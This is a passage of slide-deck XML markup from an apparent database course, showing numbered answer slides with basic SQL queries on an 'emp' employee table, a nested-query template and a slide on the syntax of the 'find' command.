            <a:ext cx="8857200" cy="90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395">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp where ename like 's%';</a:t>
            </a:r>
            <a:endParaRPr sz="2395">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3105" name="Google Shape;3105;p504"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="41040" l="0" r="50857" t="33213"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="273100" y="2206370"/>
            <a:ext cx="8679902" cy="2558101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3110" name="Google Shape;3110;p50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10</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3111" name="Google Shape;3111;p505"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="1304875"/>
            <a:ext cx="8857200" cy="90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395">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp where ename like '%s';</a:t>
            </a:r>
            <a:endParaRPr sz="2395">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3112" name="Google Shape;3112;p505"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21283" l="-256" r="47965" t="57547"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="363150" y="2573950"/>
            <a:ext cx="8520600" cy="1940301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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50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11</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3118" name="Google Shape;3118;p506"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="1304875"/>
            <a:ext cx="8857200" cy="90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395">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp where ename like '%s%';</a:t>
            </a:r>
            <a:endParaRPr sz="2395">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3119" name="Google Shape;3119;p506"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25521" l="0" r="42525" t="30392"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080825" y="2150675"/>
            <a:ext cx="6661176" cy="2874174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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50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12</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3125" name="Google Shape;3125;p507"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="1304875"/>
            <a:ext cx="8857200" cy="90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895">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp where sal &lt; comm;</a:t>
            </a:r>
            <a:endParaRPr sz="2895">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3126" name="Google Shape;3126;p507"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20904" l="0" r="28637" t="44847"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="2261451"/>
            <a:ext cx="8520600" cy="2300125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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p50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13</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3132" name="Google Shape;3132;p508"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="1000075"/>
            <a:ext cx="8857200" cy="90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895">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp where hiredate like '1981%';</a:t>
            </a:r>
            <a:endParaRPr sz="2895">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3133" name="Google Shape;3133;p508"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9299" l="0" r="18916" t="54725"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="232050" y="1901563"/>
            <a:ext cx="8679898" cy="2166286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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7" name="Shape 3137"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3138" name="Google Shape;3138;p509"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2164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14</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3139" name="Google Shape;3139;p509"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="619075"/>
            <a:ext cx="8857200" cy="90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895">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp where deptno=10 or deptno=20;</a:t>
            </a:r>
            <a:endParaRPr sz="2895">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3140" name="Google Shape;3140;p509"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7183" l="0" r="27646" t="36030"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="414050" y="1400700"/>
            <a:ext cx="8267798" cy="3649949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3145" name="Google Shape;3145;p510"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2164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15</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3146" name="Google Shape;3146;p510"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="865325"/>
            <a:ext cx="8857200" cy="731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595">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp where job&lt;&gt;'clerk' and job&lt;&gt;'salesman';</a:t>
            </a:r>
            <a:endParaRPr sz="2595">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3147" name="Google Shape;3147;p510"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23326" l="0" r="33025" t="32744"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1683277"/>
            <a:ext cx="8520600" cy="3143448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3152" name="Google Shape;3152;p511"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2164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16</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3153" name="Google Shape;3153;p511"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223875" y="789125"/>
            <a:ext cx="8857200" cy="7314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595">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alter table emp add empaddress text after ename;</a:t>
            </a:r>
            <a:endParaRPr sz="2595">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3154" name="Google Shape;3154;p511"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="28743" l="0" r="19237" t="14842"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="401300" y="1596725"/>
            <a:ext cx="8341406" cy="3277649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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8" name="Shape 3158"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3159" name="Google Shape;3159;p512"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1142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17</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3160" name="Google Shape;3160;p512"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37725" y="632150"/>
            <a:ext cx="8857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595">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp order by hiredate desc limit 0,1;</a:t>
            </a:r>
            <a:endParaRPr sz="2595">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3161" name="Google Shape;3161;p512"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="55224" l="0" r="32212" t="20991"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="173450" y="1130575"/>
            <a:ext cx="8797099" cy="1736176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3162" name="Google Shape;3162;p512"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67200" y="2906125"/>
            <a:ext cx="8857200" cy="3048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595">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp order by hiredate asc limit 0,1;</a:t>
            </a:r>
            <a:endParaRPr sz="2595">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3163" name="Google Shape;3163;p512"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="38738" l="0" r="34546" t="38698"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="173450" y="3287200"/>
            <a:ext cx="8770219" cy="1700549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3168" name="Google Shape;3168;p513"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15997" l="0" r="31473" t="9939"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="663000" y="247100"/>
            <a:ext cx="7647451" cy="4649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73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375550" y="1727663"/>
            <a:ext cx="8520600" cy="75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4520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477250" y="2537363"/>
            <a:ext cx="8317200" cy="6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50">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>find [parameters] [path] [search patterns]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3173" name="Google Shape;3173;p514"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3928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18</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3174" name="Google Shape;3174;p514"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143400" y="1152100"/>
            <a:ext cx="88572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595">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select job,avg(sal*12) from emp group by job;</a:t>
            </a:r>
            <a:endParaRPr sz="2595">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3175" name="Google Shape;3175;p514"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="28732" l="0" r="33470" t="33699"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="195850" y="1911398"/>
            <a:ext cx="8752277" cy="2779925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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9" name="Shape 3179"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3180" name="Google Shape;3180;p515"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3928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19</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3181" name="Google Shape;3181;p515"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143400" y="1131250"/>
            <a:ext cx="8857200" cy="13926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595">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select emp.deptno,sum(sal) as TotalSalary from emp where job!='clerk' group by emp.deptno having TotalSalary&gt;8000 order by TotalSalary desc;</a:t>
            </a:r>
            <a:endParaRPr sz="2595">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3182" name="Google Shape;3182;p515"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="35417" l="0" r="4616" t="39843"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="217400" y="2982325"/>
            <a:ext cx="8520600" cy="1040326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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p51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320">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nested Query</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3188" name="Google Shape;3188;p516"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544950" y="1078200"/>
            <a:ext cx="4753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50">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM &lt;tableName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2250">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE &lt;someColName&gt; = (</a:t>
            </a:r>
            <a:endParaRPr sz="2250">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    SELECT colName</a:t>
            </a:r>
            <a:endParaRPr sz="2250">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    FROM tableName</a:t>
            </a:r>
            <a:endParaRPr sz="2250">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    WHERE SomeCondition</a:t>
            </a:r>
            <a:endParaRPr sz="2250">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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2" name="Shape 3192"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3193" name="Google Shape;3193;p51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Answer 21</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3194" name="Google Shape;3194;p517"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143400" y="1228675"/>
            <a:ext cx="8857200" cy="9015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SzPts val="852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2395">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
